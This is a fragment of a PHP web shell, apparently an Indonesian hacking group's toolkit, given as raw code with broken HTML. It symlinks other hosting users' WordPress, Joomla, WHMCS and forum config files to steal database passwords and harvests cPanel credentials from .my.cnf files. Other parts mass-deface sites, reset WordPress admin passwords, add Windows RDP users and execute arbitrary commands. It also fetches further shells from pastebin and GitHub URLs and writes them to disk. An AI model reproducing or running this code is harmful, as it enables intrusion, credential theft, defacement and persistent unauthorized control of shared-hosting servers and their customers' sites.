symlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\'); symlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\'); } $d0mains = @file(\"/etc/named.conf\"); if($d0mains) { mkdir($fn); chdir($fn); foreach($d0mains as $d0main) { if(eregi(\"zone\",$d0main)) { preg_match_all(\'#zone \"(.*)\"#\', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner(\"/etc/valiases/\".$domains[1][0])); syml($user[\'name\'],$domains[1][0]); } } } echo \"
Done
\"; echo \"
Here
\"; } else { mkdir($fn); chdir($fn); $temp = \"\"; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(\':\',$uid).\"\\n\"; } echo \'
\'; $temp = trim($temp); $file5 = fopen(\"test.txt\",\"w\"); fputs($file5,$temp); fclose($file5); $htaccess = \'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk= \'; $file = fopen(\".htaccess\",\"w+\"); $write = fwrite ($file ,base64_decode($htaccess)); $file = fopen(\"test.txt\", \"r\") or exit(\"Unable to open file!\"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match(\'/\\/(.*?)\\:\\//s\', $s, $matches); $matches = str_replace(\"home/\",\"\",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == \"bin\" || $matches == \"etc/X11/fs\" || $matches == \"var/lib/nfs\" || $matches == \"var/arpwatch\" || $matches == \"var/gopher\" || $matches == \"sbin\" || $matches == \"var/adm\" || $matches == \"usr/games\" || $matches == \"var/ftp\" || $matches == \"etc/ntp\" || $matches == \"var/www\" || $matches == \"var/named\") continue; syml($matches,$matches); } fclose($file); echo \"\"; unlink(\"test.txt\"); echo \"
Done
\"; echo \"
Here
\"; } echo \"
BACK\"; exit; } ?>

Cpanel BruteForce

User :
Pass :
Type : Simple : /etc/passwd :

Get Wordlist
Url Config :

\"; break; } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'massde\')) { ?>
-:-Sukses Bos Q-:- Cek di : $lokasi
\"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($pathc,$namafile,$isi_script); } } } } } } if($_POST[\'start\']) { echo \"
\"; sabun_massal($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']); echo \"
\"; } else { echo \"
\"; echo \"

Folder :
Filename :
Script Deface :






\"; }break;?>
&x=mpc\" method=\"post\">

WordPress Mass Password Changer



\'; echo \'
Config List:
User/Password /

\'; if ($_POST[\'action\']==\'1\'){ if ($_POST[\'url\']==\'\'){ echo \"
No CONFIG FOUND
Make sure you provided a config list!

\"; }else{ $url=$_POST[\'url\']; $users = explode(\"\\n\",$url); foreach ($users as $user) { $user1=trim($user); $code=file_get_contents2($user1); preg_match_all(\'|define.*\\(.*\\\'DB_NAME\\\'.*,.*\\\'(.*)\\\'.*\\).*;|isU\',$code,$b1); $db=$b1[1][0]; preg_match_all(\'|define.*\\(.*\\\'DB_USER\\\'.*,.*\\\'(.*)\\\'.*\\).*;|isU\',$code,$b2); $user=$b2[1][0]; preg_match_all(\'|define.*\\(.*\\\'DB_PASSWORD\\\'.*,.*\\\'(.*)\\\'.*\\).*;|isU\',$code,$b3); $db_password=$b3[1][0]; preg_match_all(\'|define.*\\(.*\\\'DB_HOST\\\'.*,.*\\\'(.*)\\\'.*\\).*;|isU\',$code,$b4); $host=$b4[1][0]; preg_match_all(\'|\\$table_prefix.*=.*\\\'(.*)\\\'.*;|isU\',$code,$b5); $p=$b5[1][0]; $d=@mysql_connect( $host, $user, $db_password ) ; if ($d){ @mysql_select_db($db ); $usern=$_POST[\'username\']; $passwd=$_POST[\'password\']; $sql = \"UPDATE `\".$p.\"users` SET `user_pass` = MD5( \'\".$passwd.\"\' ) WHERE `ID` = \'1\';\"; @mysql_query($sql) ; ; $sql = \"UPDATE `\".$p.\"users` SET `user_login` = \'\".$usern.\"\' WHERE `ID` = \'1\';\"; @mysql_query($sql) ; ; $aa=@mysql_query(\"select option_value from `\".$p.\"options` WHERE `option_name` = \'siteurl\';\") ;; $siteurl=@mysql_fetch_array($aa) ; $siteurl=$siteurl[\'option_value\']; $tr.=\"$siteurl\\n\"; mysql_close(); } } if ($tr) $filename = \'changed.txt\'; $fp = fopen($filename, \"a+\"); $write = fputs($fp, $tr); fclose($fp); echo \"
Password Changing Completed ! :)

\"; echo \"View List of Password Changed Sites

\"; } } function file_get_contents2($u){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$u); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_USERAGENT,\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 \"); $result = curl_exec($ch); return $result ; } echo \"

\"; break; ?>
Monggo Pilih Toolsnya Bos Q ~_^

\"; ?> &x=massde\"> Or &x=mpc\"> Or &x=zonesH\">
[+] Stupidc0de Family [+]

♥ Respect Us, Little Crazy Family From Indonesia ^_^ ♥

-:- No Leader We Just Laugh Together -:-


http://www.Mr.Dr3awe.family/


\"; break; } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cpanel\')) { echo \"

Monggo Pilih Toolsnya Bos Q ~_^

\"; ?> &x=brute\"> Or &x=cpcrack\">



&x=cpcrack\" method=\"post\"> Cpanel Finder/Cracker
\'; echo \"
\"; $d0mains = @file(\'/etc/named.conf\'); $domains = scandir(\"/var/named\"); if ($domains or $d0mains) { $domains = scandir(\"/var/named\"); if($domains) { echo \"\"; $count=1; $dc = 0; $list = scandir(\"/var/named\"); foreach($list as $domain){ if(strpos($domain,\".db\")){ $domain = str_replace(\'.db\',\'\',$domain); $owner = posix_getpwuid(fileowner(\"/etc/valiases/\".$domain)); $dirz = \'/home/\'.$owner[\'name\'].\'/.my.cnf\'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, \'\'.$path.\'/\'.$owner[\'name\'].\'.txt\'); $p=file_get_contents(\'\'.$path.\'/\'.$owner[\'name\'].\'.txt\'); $password=entre2v2($p,\'password=\"\',\'\"\'); echo \"\"; $dc++; } } } echo \'
COUNT DOMAIN USER Password .my.cnf
\".$count++.\"\".$domain.\"\".$owner[\'name\'].\"\".$password.\"Click Here
\'; $total = $dc; echo \'
Total cPanel Found = \'.$total.\'
\'; echo \'
\'; }else{ $d0mains = @file(\'/etc/named.conf\'); if($d0mains) { echo \"\"; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone \"(.*)\"#\',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) { $infos = @posix_getpwuid(fileowner(\"/etc/valiases/\".$o)); $usr[] = $infos[\'name\']; $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file(\'/etc/passwd\'); $passwd = array(); foreach($dt as $d) { $r = explode(\':\',$d); if(strpos($r[5],\'home\')) { $passwd[$r[0]] = $r[5]; } } $l=0; $j=1; foreach($usr as $r) { $dirz = \'/home/\'.$r.\'/.my.cnf\'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, \'\'.$path.\'/\'.$r.\'.txt\'); $p=file_get_contents(\'\'.$path.\'/\'.$r.\'.txt\'); $password=entre2v2($p,\'password=\"\',\'\"\'); echo \"\"; $dc++; flush(); $l=$l?0:1; $j++; } } } echo \'
COUNT DOMAIN USER Password .my.cnf
\".$count++.\"\'.$dmn[$j-1].\' \'.$r.\"\".$password.\"Click Here
\'; $total = $dc; echo \'

Total cPanel Found = \'.$total.\'


\'; echo \'
\'; } }else{ echo \"

ERROR
/var/named or etc/named.conf Not Accessible!

\"; } echo \"\"; break; } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////END OF CPANEL TOOLS////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'vn\')) { ?> &x=vn\" method=\"post\">

Domain Viewer



OFF
\'; } else { $openBaseDir = \'ON\'; } return $openBaseDir; } echo \'
\'; $pg = basename(__FILE__); $safe_mode = @ini_get(\'safe_mode\'); $dir = @getcwd(); //////////////////////////////////////////////////// #.htaccess @mkdir(\'pee\',0777); @symlink(\"/\",\"pee/root\"); $htaccss = \"Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any\"; file_put_contents(\"pee/.htaccess\",$htaccss); $etc = file_get_contents(\"/etc/passwd\"); $etcz = explode(\"\\n\",$etc); ##Symlink to the ROOT :p foreach($etcz as $etz){ $etcc = explode(\":\",$etz); error_reporting(0); $current_dir = posix_getcwd(); $dir = explode(\"/\",$current_dir); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/wp-config.php\',\"pee/\".$etcc[0].\'-WordPress.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/blog/wp-config.php\',\"pee/\".$etcc[0].\'-WordPress.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/wp/wp-config.php\',\"pee/\".$etcc[0].\'-WordPress.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/site/wp-config.php\',\"pee/\".$etcc[0].\'-WordPress.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/config.php\',\"pee/\".$etcc[0].\'-PhpBB.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/includes/config.php\',\"pee/\".$etcc[0].\'-vBulletin.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/configuration.php\',\"pee/\".$etcc[0].\'-Joomla.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/web/configuration.php\',\"pee/\".$etcc[0].\'-Joomla.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/joomla/configuration.php\',\"pee/\".$etcc[0].\'-Joomla.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/site/configuration.php\',\"pee/\".$etcc[0].\'-Joomla.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/conf_global.php\',\"pee/\".$etcc[0].\'-IPB.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/inc/config.php\',\"pee/\".$etcc[0].\'-MyBB.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/Settings.php\',\"pee/\".$etcc[0].\'-SMF.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/sites/default/settings.php\',\"pee/\".$etcc[0].\'-Drupal.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/e107_config.php\',\"pee/\".$etcc[0].\'-e107.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/datas/config.php\',\"pee/\".$etcc[0].\'-Seditio.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/includes/configure.php\',\"pee/\".$etcc[0].\'-osCommerce.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/client/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/clientes/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/support/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/supportes/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/whmcs/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/domain/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/hosting/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/whmc/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/billing/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/portal/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/order/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/clientarea/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); symlink(\'/\'.$dir[1].\'/\'.$etcc[0].\'/\'.$dir[3].\'/domains/configuration.php\',\"pee/\".$etcc[0].\'-WHMCS.txt\'); } ############################# if(is_readable(\"/var/named\")){ echo\'\'; echo\'\'; $list = scandir(\"/var/named\"); foreach($list as $domain){ if(strpos($domain,\".db\")){ $i += 1; $domain = str_replace(\'.db\',\'\',$domain); $owner = posix_getpwuid(fileowner(\"/etc/valiases/\".$domain)); echo \"\"; } } echo \"
Total Domains Found: \".$i.\"

\"; }else{ echo \"\"; } break; ################################## error_reporting(0); $etc = file_get_contents(\"/etc/passwd\"); $etcz = explode(\"\\n\",$etc); if(is_readable(\"/etc/passwd\")){ echo\'
SITE
USER
SYMLINK
\".$domain.\"
\".$owner[\'name\'].\"
DIR
can\'t read [ /var/named ]
\'; echo\'\'; $list = scandir(\"/var/named\"); foreach($etcz as $etz){ $etcc = explode(\":\",$etz); foreach($list as $domain){ if(strpos($domain,\".db\")){ $domain = str_replace(\'.db\',\'\',$domain); $owner = posix_getpwuid(fileowner(\"/etc/valiases/\".$domain)); if($owner[\'name\'] == $etcc[0]) { $i += 1; echo \"
\"; }}}} echo \"
Total Domains Found: \".$i.\"

\";} break; ############################### if(is_readable(\"/etc/named.conf\")){ echo\'
SITE
USER
SYMLINK
\".$domain.\"\".$owner[\'name\'].\"
DIR
\'; echo\'\'; $named = file_get_contents(\"/etc/named.conf\"); preg_match_all(\'%zone \\\"(.*)\\\" {%\',$named,$domains); foreach($domains[1] as $domain){ $domain = trim($domain); $i += 1; $owner = posix_getpwuid(fileowner(\"/etc/valiases/\".$domain)); echo \"\"; } echo \"
Total Domains Found: \".$i.\"

\"; } else { echo \"\"; } break; ############################ if(is_readable(\"/etc/valiases\")){ echo\'
SITE
USER
SYMLINK
\".$domain.\"
\".$owner[\'name\'].\"
DIR
can\'t read [ /etc/named.conf ]
\'; echo\'\'; $list = scandir(\"/etc/valiases\"); foreach($list as $domain){ $i += 1; $owner = posix_getpwuid(fileowner(\"/etc/valiases/\".$domain)); echo \"
\"; } echo \"
Total Domains Found: \".$i.\"

\"; } else { echo \"\"; } break; } ///DUMP elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'dump\')) { ?>

&x=dump\" method=\"post\">
SITE
USER
SYMLINK
\".$domain.\" \".$owner[\'name\'].\"
DIR
can\'t read [ /etc/valiases ]
\';?>alert(\'Done! Access dumper.php for processing\'); hideAll();\"; echo \"

dumper.php [Click here]
\"; die(); } echo\'
\'; break; } ///menu rdp if(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'krdp\')) /* By Shor7cut */ /* Interface By Putra-Attacker*/ { if(strtoupper(substr(PHP_OS, 0, 3)) === \'WIN\') { ?>

CREATE RDP
Username :
Password :

OPTION
Username :
Password :
Action :

[+] Menambahkan User : \".$r_user.\" Password : \".$r_pass.\" Berhasil!

\".$o; }else { echo $gaya_root.\"[+] Menambahkan User : \".$r_user.\" Password : \".$r_pass.\" Gagal!

\".$o; } echo \"[+] Sedang Memroses User.. Silahkan Tunggu Sebentar..
\"; if($cmd_add_groups1){ echo $gaya_root.\"--- Selamat! User \".$r_user.\" Berhasil Di Proses!

\".$o; }else if($cmd_add_groups2){ echo $gaya_root.\"--- Selamat! User \".$r_user.\" Berhasil Di Proses!

\".$o; }else if($cmd_add_groups3){ echo $gaya_root.\"--- Selamat! User \".$r_user.\" Berhasil Di Proses!

\".$o; }else { echo $gaya_root.\"--- Maaf User \".$r_user.\" Gagal Di Proses!

\".$o; } echo \"[+] Server Info :
\"; echo $gaya_root.\"--- ServerIP : \".$_SERVER[\"HTTP_HOST\"].\"
--- Username : \".$r_user.\"
--- Password : \".$r_pass.$o.\"


\"; echo \"[+] Thank For Using It ~_^

\"; } } else if($_POST[\'kshell\']==\"2\") { echo \"\"; if($_POST[\'aksi\']==\"1\"){ echo \"
\".shell_exec(\"net user\");
							}
							else if($_POST[\'aksi\']==\"2\")
							{
								$username = $_POST[\'rusername\'];
								$cmd_cek_user   = shell_exec(\"net user\");
									if (!empty($username)){
										if(preg_match(\"/$username/\", $cmd_cek_user)){
										$cmd_add_user   = shell_exec(\"net user \".$username.\" /DELETE\");
										if($cmd_add_user){ 
											echo \"[+] Sedang Memroses.. Silahkan Tunggu..  

\"; echo $gaya_root.\"[+] Selamat! Remove User \".$username.\" Berhasil!!

\".$o; }else { echo $gaya_root.\"[+] Yah :( Remove User \".$username.\" Gagal!!

\".$o; } }else { echo $gaya_root.\"Are You Kidding Me?! Username : \" .$username. \" Itu Enggak Ada!!

\".$o; } }else { echo $gaya_root.\" Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!!

\".$o; } } else if($_POST[\'aksi\']==\"3\") { echo \"\"; $username = $_POST[\'rusername\']; $password = $_POST[\'gantipw\']; $cmd_cek_user = shell_exec(\"net user\"); if (!empty($username)){ if(preg_match(\"/$username/\", $cmd_cek_user)){ $cmd_add_user = shell_exec(\"net user \".$username.\"\"); if($cmd_add_user){ echo $gaya_root.\"Ganti Password Username : \".$username.\" dan Password : \".$password.\" Berhasil!!

\".$o; }else { echo $gaya_root.\"Ganti Password Username : \".$username.\" dan Password : \".$password.\" Gagal!!

\".$o; } }else { echo $gaya_root.\"Are You Kidding Me?! Username : \" .$username. \" Itu Enggak Ada!!

\".$o; } }else { echo $gaya_root.\" Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!!

\".$o; } } } } } else{ echo \"

TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS\"; }break; } /* AUTO UPLOAD START HERE */ elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'fcrot\')) { echo\'


File Creator [Auto upload]

 
\'; error_reporting(0); set_time_limit(0); $submit = $_POST [\'submites\']; if(isset($submit)) { $pilih = $_POST[\'pilihan\']; ///hsphere shell if ( $pilih == \'hsphere\') { $files = file_get_contents(\"https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php\"); file_put_contents(\"hsphere.php\",$files); echo \"\"; echo \"hsphere.php [Click here]
\"; die(); } elseif ( $pilih == \'adminer\') { getfile(\"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php\",\"adminer.php\"); echo \"\"; echo \"adminer.php [Click here]\"; die(); } }break; } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'korong\')) { echo \'


\'; ?>
\'; if(isset($_FILES[\'file\'])){ if(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){ echo \'\'; }else{ echo \'\'; } } echo \"


\"; break; } /////////////////////////// ////////////////////////CMD//////////////////////// elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cmd\')) { echo \"

Command :
\"; if($_POST[\'execmd\']) { echo \"
\".exe($_POST[\'cmd\']).\"
\"; } } /////////////////////////////////////////////////// ////////////////////////////////////////////////// ////////////////////////////////////////////////// elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypstuls\')) { echo \"

Monggo Pilih Toolsnya Bos Q ~_^

\"; ?> &x=bysysfuncwsf\"> Or &x=bypsini\"> Or &x=bysysfuncwexec\">



Bypass Root Path With System Function
\'; mkdir(\'bysyswsf\', 0755); chdir(\'bysyswsf\'); $bysyswsf = file_get_contents(\"http://pastebin.com/raw/nUTTPQnm\"); $file = fopen(\"bysyswsf.php\" ,\"w+\"); $write = fwrite ($file ,$bysyswsf); fclose($file); chmod(\"bysyswsf.php\",0755); echo \"\"; } //////////////////////////////////////// //////////////////////////////////////// elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypsini\')) { $byht = \"safe_mode = Off disable_functions = None safe_mode_gid = OFF open_basedir = OFF allow_url_fopen = On\"; file_put_contents(\"php.ini\",$byht); echo \"\"; die(\'\'); } //////////////////////////////////////// /////////////////////////////////////// elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bysysfuncwexec\')) { echo \'
Bypass Root Path With Exec Function
\'; mkdir(\'bysyswexecf\', 0755); chdir(\'bysyswexecf\'); $bysyswsf = file_get_contents(\"http://pastebin.com/raw/KJiLdADd\"); $file = fopen(\"bysyswexecf.php\" ,\"w+\"); $write = fwrite ($file ,$bysyswsf); fclose($file); chmod(\"bysyswexecf.php\",0755); echo \"\"; } //////////////////////////////////////// //////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// ///////////JUMPING//////////////////////////////////////////////////////// ////////////////////////////////////////// elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jumping\')){ ?>
&x=jumping\" method=\"post\"> Error: safe_mode = on\'); set_time_limit(0); ################### @$passwd = fopen(\'/etc/passwd\',\'r\'); if (!$passwd) { die(\'
[-] Error : coudn`t read /etc/passwd\'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,\':\'); $username = substr($str,0,$pos); $dirz = \'/home/\'.$username.\'/public_html/\'; if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } ################### echo \'

\'; echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\".\"
\"; echo \"[+] Founded \".sizeof($pub).\" readable public_html directories\\n\".\"
\"; echo \"[~] Searching for passwords in config files...

\"; foreach ($users as $user) { $path = \"/home/$user/public_html/\"; echo \"$path
\"; } echo \"
[+] Complete...\\n\".\"
\"; echo \"[+] Monggo Sikat Boz!\\n\".\"
\"; echo \'

\'; } /////////////// elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'zonesH\')){ echo \"

